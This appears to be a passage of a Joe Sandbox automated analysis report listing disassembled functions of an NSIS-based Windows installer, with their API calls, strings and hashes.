                                                                                                                                                                                  • ptF, xrefs: 00406D1A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                  • API String ID: 2035342205-1650287579
                                                                                                                                                                                  • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                  • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                  • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                  Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                  • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                  • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                    • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                    • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427DC1,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                  • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                  • String ID: F$A
                                                                                                                                                                                  • API String ID: 3347642858-1281894373
                                                                                                                                                                                  • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                  • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                  • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                  • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                  Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                  • API String ID: 1916479912-1189179171
                                                                                                                                                                                  • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                  • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                  • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                  Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427DC1,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                  • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                  • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427DC1,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                  • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                  • API String ID: 3581403547-1792361021
                                                                                                                                                                                  • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                  • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                  Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                  • API String ID: 542301482-1377821865
                                                                                                                                                                                  • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                  • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                  Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                    • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                  • API String ID: 20674999-2124804629
                                                                                                                                                                                  • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                  • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                  • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                  Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                    • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                  • String ID: F$N$open
                                                                                                                                                                                  • API String ID: 3928313111-1104729357
                                                                                                                                                                                  • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                  • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                  Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                  • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                  • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                  • API String ID: 565278875-3368763019
                                                                                                                                                                                  • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                  • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                  • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
